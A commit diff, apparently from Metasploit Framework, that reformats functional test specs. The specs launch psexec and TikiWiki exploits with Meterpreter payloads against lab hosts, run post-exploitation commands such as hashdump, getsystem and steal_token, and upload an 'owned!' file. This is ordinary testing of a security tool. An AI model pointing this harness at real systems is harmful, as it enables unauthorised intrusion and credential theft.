Run rubocop --fix-layout test

adfoster-r7 2022-04-28 15:06:43 +01:00
parent bf00619717
commit 29cc349649
No known key found for this signature in database
GPG Key ID: 3BD4FA3818818F04
52 changed files with 1368 additions and 1440 deletions


@ -7,27 +7,85 @@ require 'fileutils'
require 'msf_matchers' require 'msf_matchers'
require 'msf_test_case' require 'msf_test_case'
module MsfTest module MsfTest
include MsfTest::MsfMatchers
include MsfTest::MsfMatchers ## This spec exists to help us describe the behavior of msfconsole - TODO
describe "Msfconsole" do
###
# Setup!
###
## This spec exists to help us describe the behavior of msfconsole - TODO before :all do
@working_directory = File.dirname(__FILE__)
## Static specs will make use of RC files here
@static_resource_directory = "#{@working_directory}/msftest/resource"
## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc"
## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output"
## Create a framework object
@framework = ::Msf::Simple::Framework.create
end
before :each do
end
after :each do
end
after :all do
## Clean up
# FileUtils.rm_rf(@temp_directory)
end
###
# Static Test cases!
###
it "should start and let us run help" do
data = start_console_and_run_rc("help", "#{@static_resource_directory}/help.rc")
success_strings = [
'help',
'Database Backend Commands',
'Core Commands'
]
failure_strings = [] | generic_failure_strings
failure_exception_strings = [] | generic_failure_exception_strings
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
end
it "should generate a meterpreter session against a vulnerable win32 host" do
## Set input & output to something sane
input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::File.new("temp.output")
session = generate_x86_meterpreter_session(input, output)
session.should_not be_nil
if session
session.load_stdapi
session.run_cmd("help")
else
flunk "Error interacting with session"
end
end
###
# Dynamic Test Cases!!
###
describe "Msfconsole" do
###
# Setup!
###
before :all do
@working_directory = File.dirname(__FILE__) @working_directory = File.dirname(__FILE__)
## Static specs will make use of RC files here
@static_resource_directory = "#{@working_directory}/msftest/resource"
## Directories for the generated specs ## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs" @temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc" @temp_input_directory = "#{@temp_directory}/generated_rc"
@ -35,176 +93,112 @@ describe "Msfconsole" do
## Where all output from the runs will go ## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output" @temp_output_directory = "#{@temp_directory}/output"
## Create a framework object if File.directory? @temp_directory
@framework = ::Msf::Simple::Framework.create FileUtils.rm_rf(@temp_directory)
end
before :each do
end
after :each do
end
after :all do
## Clean up
#FileUtils.rm_rf(@temp_directory)
end
###
# Static Test cases!
###
it "should start and let us run help" do
data = start_console_and_run_rc("help","#{@static_resource_directory}/help.rc")
success_strings = [ 'help',
'Database Backend Commands',
'Core Commands' ]
failure_strings = [] | generic_failure_strings
failure_exception_strings = [] | generic_failure_exception_strings
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
end
it "should generate a meterpreter session against a vulnerable win32 host" do
## Set input & output to something sane
input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::File.new("temp.output")
session = generate_x86_meterpreter_session(input, output)
session.should_not be_nil
if session
session.load_stdapi
session.run_cmd("help")
else
flunk "Error interacting with session"
end end
end
###
# Dynamic Test Cases!!
###
@working_directory = File.dirname(__FILE__) Dir.mkdir(@temp_directory)
Dir.mkdir(@temp_input_directory)
Dir.mkdir(@temp_output_directory)
## Directories for the generated specs Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
@temp_directory = "#{@working_directory}/msfconsole_specs" ## Parse this test case
@temp_input_directory = "#{@temp_directory}/generated_rc" test_case = MsfTestCase.new(filename)
puts "Found #{test_case.name} in: #{filename}"
## Where all output from the runs will go ## Write the commands back to a temporary RC file
@temp_output_directory = "#{@temp_directory}/output" puts "Writing #{@temp_input_directory}/#{test_case.name}.rc"
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands }
if File.directory? @temp_directory ## Create the rspec Test Case
FileUtils.rm_rf(@temp_directory) it "should #{test_case.name}" do
end ## Gather the success / failure strings, and combine with the generics
success_strings = test_case.expected_successes
failure_strings = test_case.expected_failures | generic_failure_strings
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
Dir.mkdir(@temp_directory) ## run the commands
Dir.mkdir(@temp_input_directory) data = start_console_and_run_rc(test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
Dir.mkdir(@temp_output_directory)
Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
## Parse this test case
test_case = MsfTestCase.new(filename)
puts "Found #{test_case.name} in: #{filename}"
## Write the commands back to a temporary RC file ## check the output
puts "Writing #{@temp_input_directory}/#{test_case.name}.rc" data.should contain_all_successes(success_strings)
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands } data.should contain_no_failures_except(failure_strings, failure_exception_strings)
## Create the rspec Test Case ## Clean up
it "should #{test_case.name}" do # File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
# File.delete("#{@temp_output_directory}/#{test_case.name}")
## Gather the success / failure strings, and combine with the generics end
success_strings = test_case.expected_successes
failure_strings = test_case.expected_failures | generic_failure_strings
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
## run the commands
data = start_console_and_run_rc( test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
## check the output
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
## Clean up
#File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
#File.delete("#{@temp_output_directory}/#{test_case.name}")
end end
end
### ###
# Test case helpers: # Test case helpers:
### ###
def generic_success_strings def generic_success_strings
[] []
end
def generic_failure_strings
['fatal', 'fail', 'error', 'exception']
end
def generic_failure_exception_strings
[]
end
def start_console_and_run_rc(name,rc_file, database_file=false)
output_file = "#{@temp_output_directory}/#{name}"
if database_file
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
else
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
end end
system("#{msfconsole_string}")
data = hlp_file_to_string("#{output_file}") def generic_failure_strings
end ['fatal', 'fail', 'error', 'exception']
def generate_x86_meterpreter_session(input, output)
## Setup for win32
exploit_name = 'windows/smb/psexec'
payload_name = 'windows/meterpreter/bind_tcp'
## Fire it off against a known-vulnerable host
session = @framework.exploits.create(exploit_name).exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
'Payload' => payload_name,
'LocalInput' => input,
'LocalOutput' => output)
## If a session came back, try to interact with it.
if session
return session
else
return nil
end end
end
def generate_win64_meterpreter_session(input, output) def generic_failure_exception_strings
raise "Not Implemented" []
end end
def start_console_and_run_rc(name, rc_file, database_file = false)
def generate_java_meterpreter_session(input, output) output_file = "#{@temp_output_directory}/#{name}"
raise "Not Implemented"
end if database_file
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
def generate_php_meterpreter_session(input, output) else
raise "Not Implemented" msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
end end
def hlp_file_to_string(filename) system("#{msfconsole_string}")
data = ""
f = File.open(filename, "r") data = hlp_file_to_string("#{output_file}")
f.each_line do |line| end
data += line
def generate_x86_meterpreter_session(input, output)
## Setup for win32
exploit_name = 'windows/smb/psexec'
payload_name = 'windows/meterpreter/bind_tcp'
## Fire it off against a known-vulnerable host
session = @framework.exploits.create(exploit_name).exploit_simple(
'Options' => { 'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => "" },
'Payload' => payload_name,
'LocalInput' => input,
'LocalOutput' => output
)
## If a session came back, try to interact with it.
if session
return session
else
return nil
end
end
def generate_win64_meterpreter_session(input, output)
raise "Not Implemented"
end
def generate_java_meterpreter_session(input, output)
raise "Not Implemented"
end
def generate_php_meterpreter_session(input, output)
raise "Not Implemented"
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end end
return data
end end
end end
end


@ -1,19 +1,15 @@
module MsfTest module MsfTest
module JavaMeterpreterSpecs module JavaMeterpreterSpecs
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
## This file is intended to be used in conjunction with a harness, def self.included(base)
## such as meterpreter_win32_spec.rb base.class_eval do
it "should not error when taking a screenshot" do
def self.included(base) success_strings = [ 'Screenshot saved to' ]
base.class_eval do hlp_run_command_check_output("screenshot", "screenshot", success_strings)
end
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end end
end end
end end
end
end end


@ -7,85 +7,80 @@ require 'meterpreter_spec_helper'
require 'meterpreter_specs' require 'meterpreter_specs'
module MsfTest module MsfTest
describe "JavaMeterpreter" do
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
describe "JavaMeterpreter" do # This include brings in all the specs that are generic across the
# meterpreter platforms
# This include brings in all the spec helper methods include MsfTest::MeterpreterSpecs
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the java
# meterpreter
include MsfTest::JavaMeterpreterSpecs
before :all do # This include brings in all the specs that are specific to the java
@verbose = true # meterpreter
include MsfTest::JavaMeterpreterSpecs
@meterpreter_type = "java"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory before :all do
@verbose = true
@meterpreter_type = "java"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_java
end
before :each do
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
# FileUtils.rm_rf("*.jpeg")
# FileUtils.rm_rf("payload.jar")
FileUtils.rm_rf(@output_directory) FileUtils.rm_rf(@output_directory)
end end
Dir.mkdir(@output_directory) def create_session_java
@default_file = "#{@output_directory}/default" ## Setup for win32
@framework = Msf::Simple::Framework.create
create_session_java test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules')
end @framework.modules.add_module_path(test_modules_path)
before :each do @exploit_name = 'test/java_tester'
@payload_name = 'java/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
end # Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
after :each do ## Fire it off against a known-vulnerable host
@session.init_ui(@input, @output) @session = exploit.exploit_simple(
end 'Options' => {},
'Payload' => @payload_name,
after :all do 'LocalInput' => @input,
#FileUtils.rm_rf("*.jpeg") 'LocalOutput' => @output
#FileUtils.rm_rf("payload.jar") )
FileUtils.rm_rf(@output_directory)
end
puts @session.inspect
def create_session_java
## Setup for win32 ## If a session came back, try to interact with it.
@framework = Msf::Simple::Framework.create if @session
@session.load_stdapi
test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules') else
@framework.modules.add_module_path(test_modules_path) raise Exception "Couldn't get a session!"
end
@exploit_name = 'test/java_tester'
@payload_name = 'java/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
puts @session.inspect
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end end
end end
end
end end


@ -7,76 +7,71 @@ require 'meterpreter_spec_helper'
require 'meterpreter_specs' require 'meterpreter_specs'
module MsfTest module MsfTest
describe "PhpMeterpreter" do
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
describe "PhpMeterpreter" do # This include brings in all the specs that are generic across the
# meterpreter platforms
# This include brings in all the spec helper methods include MsfTest::MeterpreterSpecs
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
before :all do before :all do
@verbose = true @verbose = true
@meterpreter_type = "php"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory @meterpreter_type = "php"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_php
end
before :each do
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
FileUtils.rm_rf(@output_directory) FileUtils.rm_rf(@output_directory)
end end
Dir.mkdir(@output_directory) def create_session_php
@default_file = "#{@output_directory}/default" ## Setup for php
@framework = Msf::Simple::Framework.create
create_session_php @exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
end @payload_name = 'php/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
before :each do # Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
end ## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => { 'RHOST' => "metasploitable" },
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output
)
after :each do puts @session.inspect
@session.init_ui(@input, @output)
end
after :all do
FileUtils.rm_rf(@output_directory)
end
## If a session came back, try to interact with it.
def create_session_php if @session
@session.load_stdapi
## Setup for php else
@framework = Msf::Simple::Framework.create raise Exception "Couldn't get a session!"
end
@exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
@payload_name = 'php/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {'RHOST' => "metasploitable"},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
puts @session.inspect
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end end
end end
end
end end


@ -1,58 +1,55 @@
module MsfTest module MsfTest
module MeterpreterSpecHelper module MeterpreterSpecHelper
def self.included(base)
def self.included(base) base.class_eval do
base.class_eval do def generic_failure_strings
['fail', 'error', 'exception']
def generic_failure_strings
['fail', 'error', 'exception']
end
def generic_failure_exception_strings
['nserror.dll', 'tiki-error.php','tiki-error_simple.php','tiki-rss_error.php'] ##ugh, this is dependent on the target
end
def hlp_run_command_check_output(name,command,success_strings=[],fail_strings=[], fail_exception_strings=[])
fail_strings = fail_strings | generic_failure_strings
fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
temp_command_file = "#{@output_directory}/#{name}"
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
@session.init_ui(@input, command_output)
command_output.print_line("meterpreter_functional_test_start")
if @verbose
puts "Running Command: " + command
end end
@session.run_cmd(command) def generic_failure_exception_strings
command_output.print_line("meterpreter_functional_test_end") ['nserror.dll', 'tiki-error.php', 'tiki-error_simple.php', 'tiki-rss_error.php'] # #ugh, this is dependent on the target
data = hlp_file_to_string(temp_command_file)
data.should contain_a_complete_test
data.should contain_all_successes
data.should contain_no_failures_except
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end end
return data
end def hlp_run_command_check_output(name, command, success_strings = [], fail_strings = [], fail_exception_strings = [])
fail_strings = fail_strings | generic_failure_strings
def hlp_string_to_file(string, filepath) fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
# Create a new file and write to it
File.open(filepath, 'w') do |f2| temp_command_file = "#{@output_directory}/#{name}"
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
@session.init_ui(@input, command_output)
command_output.print_line("meterpreter_functional_test_start")
if @verbose
puts "Running Command: " + command
end
@session.run_cmd(command)
command_output.print_line("meterpreter_functional_test_end")
data = hlp_file_to_string(temp_command_file)
data.should contain_a_complete_test
data.should contain_all_successes
data.should contain_no_failures_except
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end
def hlp_string_to_file(string, filepath)
# Create a new file and write to it
File.open(filepath, 'w') do |f2|
f2.puts string f2.puts string
end end
end
end end
end end
end end
end end
end


@ -1,11 +1,10 @@
module MsfTest module MsfTest
module MeterpreterSpecs module MeterpreterSpecs
def self.included(base)
def self.included(base) base.class_eval do
base.class_eval do it "should not error when running each command" do
commands = [
it "should not error when running each command" do "?",
commands = [ "?",
"background", "background",
"bgkill", "bgkill",
"bglist", "bglist",
@ -15,9 +14,9 @@ module MeterpreterSpecs
"exit", "exit",
"help", "help",
"interact", "interact",
#"irb", # "irb",
"migrate", "migrate",
#"quit", # "quit",
"read", "read",
"run", "run",
"use", "use",
@ -27,7 +26,7 @@ module MeterpreterSpecs
"cd", "cd",
"del", "del",
"download", "download",
#"edit", # "edit",
"getlwd", "getlwd",
"getwd", "getwd",
"lcd", "lcd",
@ -50,11 +49,11 @@ module MeterpreterSpecs
"getuid", "getuid",
"kill", "kill",
"ps", "ps",
#"reboot", # "reboot",
"reg", "reg",
"rev2self", "rev2self",
#"shell", # "shell",
#"shutdown", # "shutdown",
"steal_token", "steal_token",
"sysinfo", "sysinfo",
"enumdesktops", "enumdesktops",
@ -69,41 +68,43 @@ module MeterpreterSpecs
"getsystem", "getsystem",
"hashdump", "hashdump",
"timestomp" "timestomp"
] ]
## Run each command, check for execeptions ## Run each command, check for execeptions
commands.each do |command| commands.each do |command|
hlp_run_command_check_output("basic_#{command}",command) hlp_run_command_check_output("basic_#{command}", command)
end
end end
end
it "should not error when running help" do it "should not error when running help" do
success_strings = [ 'Core Commands', success_strings = [
'Stdapi: File system Commands', 'Core Commands',
'Stdapi: Networking Commands', 'Stdapi: File system Commands',
'Stdapi: System Commands', 'Stdapi: Networking Commands',
'Stdapi: User interface Commands'] 'Stdapi: System Commands',
'Stdapi: User interface Commands'
hlp_run_command_check_output("help","help", success_strings) ]
hlp_run_command_check_output("help", "help", success_strings)
end
it "should not error when running the help shortcut" do
success_strings = [
'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands'
]
hlp_run_command_check_output("help_shortcut", "?", success_strings)
end
it "should not error when checking for background channels" do
success_strings = [ 'No active channels.' ]
hlp_run_command_check_output("channel_list_empty", "channel -l", success_strings)
end
end end
it "should not error when running the help shortcut" do
success_strings = [ 'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands' ]
hlp_run_command_check_output("help_shortcut","?", success_strings)
end
it "should not error when checking for background channels" do
success_strings = [ 'No active channels.' ]
hlp_run_command_check_output("channel_list_empty","channel -l", success_strings)
end
end end
end end
end
end end


@ -10,94 +10,87 @@ require 'meterpreter_specs'
require 'windows_meterpreter_specs' require 'windows_meterpreter_specs'
module MsfTest module MsfTest
describe "Win32Meterpreter" do
# Include Custom Matchers
include MsfTest::MsfMatchers
describe "Win32Meterpreter" do # This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# Include Custom Matchers # This include brings in all the specs that are generic across the
include MsfTest::MsfMatchers # meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the
# This include brings in all the spec helper methods # windows meterpreter platforms
include MsfTest::MeterpreterSpecHelper include MsfTest::WindowsMeterpreterSpecs
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the before :all do
# windows meterpreter platforms @verbose = true
include MsfTest::WindowsMeterpreterSpecs
before :all do @meterpreter_type = "win32"
@verbose = true
@meterpreter_type = "win32"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory ## Set up an outupt directory
FileUtils.rm_rf(@output_directory) @output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_windows_x32
end end
Dir.mkdir(@output_directory) before :each do
@default_file = "#{@output_directory}/default" end
create_session_windows_x32 after :each do
end @session.init_ui(@input, @output)
end
before :each do after :all do
## Clean up test output
FileUtils.rm_rf(@output_directory)
end ## Screenshot command leaves .jpegs :(
## TODO - fix the meterpreter command to write to
after :each do ## TODO - an arbitrary file.
@session.init_ui(@input, @output) Dir.new(File.dirname(__FILE__)).each do |file|
end if file =~ /.jpeg/
File.delete(file)
after :all do end
## Clean up test output
FileUtils.rm_rf(@output_directory)
## Screenshot command leaves .jpegs :(
## TODO - fix the meterpreter command to write to
## TODO - an arbitrary file.
Dir.new(File.dirname(__FILE__)).each do |file|
if file =~ /.jpeg/
File.delete(file)
end end
end end
end
def create_session_windows_x32
## Setup for win32 def create_session_windows_x32
@framework = Msf::Simple::Framework.create ## Setup for win32
@exploit_name = 'windows/smb/psexec' @framework = Msf::Simple::Framework.create
@payload_name = 'windows/meterpreter/bind_tcp' @exploit_name = 'windows/smb/psexec'
@input = Rex::Ui::Text::Input::Stdio.new @payload_name = 'windows/meterpreter/bind_tcp'
@output = Rex::Ui::Text::Output::File.new(@default_file) @input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance # Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name) exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host ## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple( @session = exploit.exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""}, 'Options' => { 'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => "" },
'Payload' => @payload_name, 'Payload' => @payload_name,
'LocalInput' => @input, 'LocalInput' => @input,
'LocalOutput' => @output) 'LocalOutput' => @output
)
## If a session came back, try to interact with it. ## If a session came back, try to interact with it.
if @session if @session
puts "got a session" puts "got a session"
@session.load_stdapi @session.load_stdapi
else else
puts "unable to get session" puts "unable to get session"
#flunk "Couldn't get a session!" # flunk "Couldn't get a session!"
end
end end
end end
end
end end


@ -1,49 +1,46 @@
module MsfTest module MsfTest
module WindowsMeterpreterSpecs module WindowsMeterpreterSpecs
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
## This file is intended to be used in conjunction with a harness, def self.included(base)
## such as meterpreter_win32_spec.rb base.class_eval do
it "should not error when uploading a file to a windows box" do
upload_success_strings = [
'uploading',
'uploaded'
]
def self.included(base) ## create a file to upload
base.class_eval do filename = "/tmp/whatever"
if File.exist?(filename)
FileUtils.rm(filename)
end
hlp_string_to_file("owned!", filename)
it "should not error when uploading a file to a windows box" do ## run the upload / quit commands
upload_success_strings = [ 'uploading', hlp_run_command_check_output("upload", "upload #{filename} C:\\", upload_success_strings)
'uploaded' ] # hlp_run_command_check_output("quit","quit")
## create a file to upload ## clean up
filename = "/tmp/whatever"
if File.exist?(filename)
FileUtils.rm(filename) FileUtils.rm(filename)
end end
hlp_string_to_file("owned!", filename)
## run the upload / quit commands it "should show the priv commands when running help" do
hlp_run_command_check_output("upload","upload #{filename} C:\\", upload_success_strings) success_strings = [
#hlp_run_command_check_output("quit","quit") 'Priv: Elevate Commands',
'Priv: Password database Commands',
'Priv: Timestomp Commands'
]
## clean up hlp_run_command_check_output("help_shortcut", "help", success_strings)
FileUtils.rm(filename) end
end
it "should show the priv commands when running help" do
success_strings = ['Priv: Elevate Commands',
'Priv: Password database Commands',
'Priv: Timestomp Commands' ]
hlp_run_command_check_output("help_shortcut","help", success_strings)
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot", "screenshot", success_strings)
end
end end
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end
end end
end end
end
end end


@ -1,7 +1,7 @@
class Array class Array
@@to_s_reported = {} @@to_s_reported = {}
def to_s(*args) def to_s(*args)
if(not @@to_s_reported[caller[0].to_s]) if (not @@to_s_reported[caller[0].to_s])
$stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}" $stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}"
@@to_s_reported[caller[0].to_s] = true @@to_s_reported[caller[0].to_s] = true
end end


@ -1,7 +1,6 @@
class String class String
@@idx_reported = {} @@idx_reported = {}
def [](*args) def [](*args)
if args.length == 1 && args[0].class == ::Integer && !@@idx_reported[caller[0].to_s] if args.length == 1 && args[0].class == ::Integer && !@@idx_reported[caller[0].to_s]
$stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n" $stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n"
@@idx_reported[caller[0].to_s] = true @@idx_reported[caller[0].to_s] = true


@ -1,68 +1,63 @@
module Msf module Msf
module ModuleTest
attr_accessor :tests
attr_accessor :failures
module ModuleTest def initialize(info = {})
attr_accessor :tests @tests = 0
attr_accessor :failures @failures = 0
super
end
def initialize(info={}) def run_all_tests
@tests = 0 tests = self.methods.select { |m| m.to_s =~ /^test_/ }
@failures = 0 tests.each { |test_method|
super self.send(test_method)
end }
end
def run_all_tests def it(msg = "", &block)
tests = self.methods.select { |m| m.to_s =~ /^test_/ } @tests += 1
tests.each { |test_method| begin
self.send(test_method) result = block.call
} unless result
print_error("FAILED: #{msg}")
end print_error("FAILED: #{error}") if error
@failures += 1
def it(msg="", &block) return
@tests += 1 end
begin rescue ::Exception => e
result = block.call
unless result
print_error("FAILED: #{msg}") print_error("FAILED: #{msg}")
print_error("FAILED: #{error}") if error print_error("Exception: #{e.class} : #{e}")
@failures += 1 dlog("Exception in testing - #{msg}")
dlog("Call stack: #{e.backtrace.join("\n")}")
return return
end end
rescue ::Exception => e
print_error("FAILED: #{msg}") print_good("#{msg}")
print_error("Exception: #{e.class} : #{e}")
dlog("Exception in testing - #{msg}")
dlog("Call stack: #{e.backtrace.join("\n")}")
return
end end
print_good("#{msg}") def pending(msg = "", &block)
print_status("PENDING: #{msg}")
end
end end
def pending(msg="", &block) module ModuleTest::PostTest
print_status("PENDING: #{msg}") include ModuleTest
end def run
end print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type} and platform is #{session.platform}")
module ModuleTest::PostTest t = Time.now
include ModuleTest @tests = 0; @failures = 0
def run run_all_tests
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type} and platform is #{session.platform}")
t = Time.now vprint_status("Testing complete in #{Time.now - t}")
@tests = 0; @failures = 0 if (@failures > 0)
run_all_tests print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
else
vprint_status("Testing complete in #{Time.now - t}") print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
if (@failures > 0) end
print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
else
print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
end end
end end
end end
end
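Review bot: The `rescue ::Exception => e` branch of `it` prints `FAILED: #{msg}` and returns without `@failures += 1`, so a test whose block raises is shown as failed on the console but left out of the failure count. `PostTest#run` then computes `Passed: #{@tests - @failures}`, which counts that test as passed. Adding `@failures += 1` before the `return` in the rescue branch keeps the summary in line with the per-test output. The same branch also catches `Interrupt` and `SystemExit`, so an operator's Ctrl-C is presumably logged as one more failed test instead of stopping the run; a preceding `rescue ::Interrupt, ::SystemExit` that re-raises would avoid that.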


@ -2,93 +2,91 @@ $:.unshift(File.join((File.dirname(__FILE__))))
require 'regexr' require 'regexr'
module MsfTest module MsfTest
module MsfMatchers
class ContainACompleteTest
module MsfMatchers def initialize()
@r = Regexr.new(true)
end
class ContainACompleteTest def matches?(data)
@data = data
return @r.verify_start_and_end(@data, "meterpreter_functional_test_start", "meterpreter_functional_test_end")
end
def failure_message
"Beginning or end was incorrect."
end
def negative_failure_message
"Expected to find a no beginning or end, but it matched."
end
def initialize()
@r = Regexr.new(true)
end end
def matches?(data) def contain_a_complete_test
@data = data ContainACompleteTest.new
return @r.verify_start_and_end(@data,"meterpreter_functional_test_start", "meterpreter_functional_test_end")
end end
def failure_message class ContainAllSuccesses
"Beginning or end was incorrect."
def initialize(successes = [])
@successes = successes
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_dont_exist_in_data(@data, @successes)
return true if !@string
nil
end
def failure_message
"expected all successes, but didn't find '#{@string}'"
end
def negative_failure_message
"expected to miss successes but found'm all :("
end
# alias :have_all_successes :contain_all_successes
end end
def negative_failure_message def contain_all_successes(successes = [])
"Expected to find a no beginning or end, but it matched." ContainAllSuccesses.new(successes)
end end
class ContainNoFailuresExcept
def initialize(failures = [], exceptions = [])
@failures = failures
@exceptions = exceptions
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_exist_in_data_except(@data, @failures, @exceptions)
return true if !@string
nil
end
def failure_message
"expected no failure to be found, but found this: '#{@string}'"
end
def negative_falure_message
"expected to find failures, but didn't find any :("
end
# alias :have_no_failures :contain_no_failures
end
def contain_no_failures_except(failures = [], exceptions = [])
ContainNoFailuresExcept.new(failures, exceptions)
end
end end
def contain_a_complete_test
